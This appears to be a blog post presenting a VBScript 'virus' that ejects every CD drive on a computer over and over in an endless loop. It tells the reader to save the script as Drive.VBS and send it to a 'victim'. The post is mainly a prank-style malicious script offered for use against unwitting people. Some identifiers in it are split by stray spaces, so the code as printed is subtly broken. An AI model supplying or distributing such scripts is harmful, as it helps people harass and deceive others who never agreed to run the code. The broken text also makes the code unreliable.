Virus that pop out CD Drive

write in notepad
Continually pop out your victim's CD Drive. If he / she has more than one, it pops out all of them!(code is given below)
Type :
Set oWMP = CreateObject("WMPlayer.OCX. 7")
Set colCDROMs = oWMP.cdromCollectio n
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item( i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Drive.VBS" and send it.

Categories: , ,

0 comments:

Post a Comment